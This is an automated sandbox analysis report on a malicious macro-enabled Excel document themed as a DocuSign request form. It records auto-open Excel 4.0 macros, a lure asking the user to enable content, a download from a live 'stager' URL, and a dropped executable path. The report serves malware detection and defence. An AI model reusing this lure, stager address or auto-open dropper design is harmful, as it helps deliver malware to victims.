Loading ...

Play interactive tourEdit tour

Analysis Report request_form_1611306935.xlsm

Overview

General Information

Sample Name:request_form_1611306935.xlsm
Analysis ID:343133
MD5:5fd958006a94c6145364c06bbf264d06
SHA1:d5cc7dc1083508dbe5531db67a3f78866e00330c
SHA256:f41c4588d2ef8936d9417069a1c5a44833fb2994c60c54bda14b1aac9aa7b83a

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Checks for available system drives (often done to infect USB drives)
Excel documents contains an embedded macro which executes code when the document is opened
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 4180 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: z:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: x:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: v:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: t:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: r:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: p:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: n:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: l:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: j:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: h:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: f:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: b:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: y:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: w:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: u:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: s:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: q:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: o:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: m:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: k:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: i:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: g:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: e:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: c:Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: a:Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\grdbs\fkdks\djdks.exeJump to behavior
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: global trafficDNS query: name: jvdattorney.com
Source: global trafficTCP traffic: 192.168.2.3:49716 -> 162.241.225.18:80
Source: global trafficTCP traffic: 192.168.2.3:49716 -> 162.241.225.18:80
Source: global trafficHTTP traffic detected: GET /stager/babmboa.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jvdattorney.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /stager/babmboa.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jvdattorney.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /stager/babmboa.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jvdattorney.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /stager/babmboa.php HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jvdattorney.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: jvdattorney.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.aadrm.com/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.cortana.ai
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.office.net
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.onedrive.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://augloop.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://cdn.entity.
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://clients.config.office.net/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://config.edge.skype.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentities
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://contentstorage.omex.office.net/addinclassifier/officeentitiesupdated
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://cortana.ai
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://cortana.ai/api
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://cr.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://dev.cortana.ai
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://devnull.onenote.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://directory.services.
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://graph.windows.net
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://graph.windows.net/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://lifecycle.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://login.windows.local
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://management.azure.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://management.azure.com/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://messaging.office.com/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://officeapps.live.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://onedrive.live.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://outlook.office.com/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://outlook.office365.com/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://settings.outlook.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://staging.cortana.ai
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://tasks.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 39636F9C-B5B5-4FAD-89B6-83FE7D2DF2A0.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 8Screenshot OCR: Enable Content ^ X J14 " i 7c v' J& A A B C D IE IF iG IH I K L I M I N I O I P I Q R S T - 1
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: request_form_1611306935.xlsmInitial sample: CALL
Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="4" rupBuild="9303"/><workbookPr filterPrivacy="1" defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="8" r:id="rId1"/><sheet name="Doc1" sheetId="5" r:id="rId2"/><sheet name="Doc2" sheetId="3" r:id="rId3"/></sheets><functionGroups builtInGroupCount="17"/><definedNames><definedName name="dontdoit" function="1" xlm="1" functionGroupId="9">-676986879</definedName><definedName name="okwell" function="1" xlm="1" functionGroupId="9">124715010</definedName><definedName name="plzno" function="1" xlm="1" functionGroupId="9">-709623808</definedName><definedName name="_xlnm.Auto_Open">'Doc1'!$AA$5</definedName></definedNames><calcPr calcId="145621"/></workbook>
Source: classification engineClassification label: mal64.expl.evad.winXLSM@2/12@1/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{BFEDECB9-1583-4F86-B2B2-B4190A1B1601} - OProcSessId.datJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: request_form_1611306935.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: request_form_1611306935.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: request_form_1611306935.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: request_form_1611306935.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
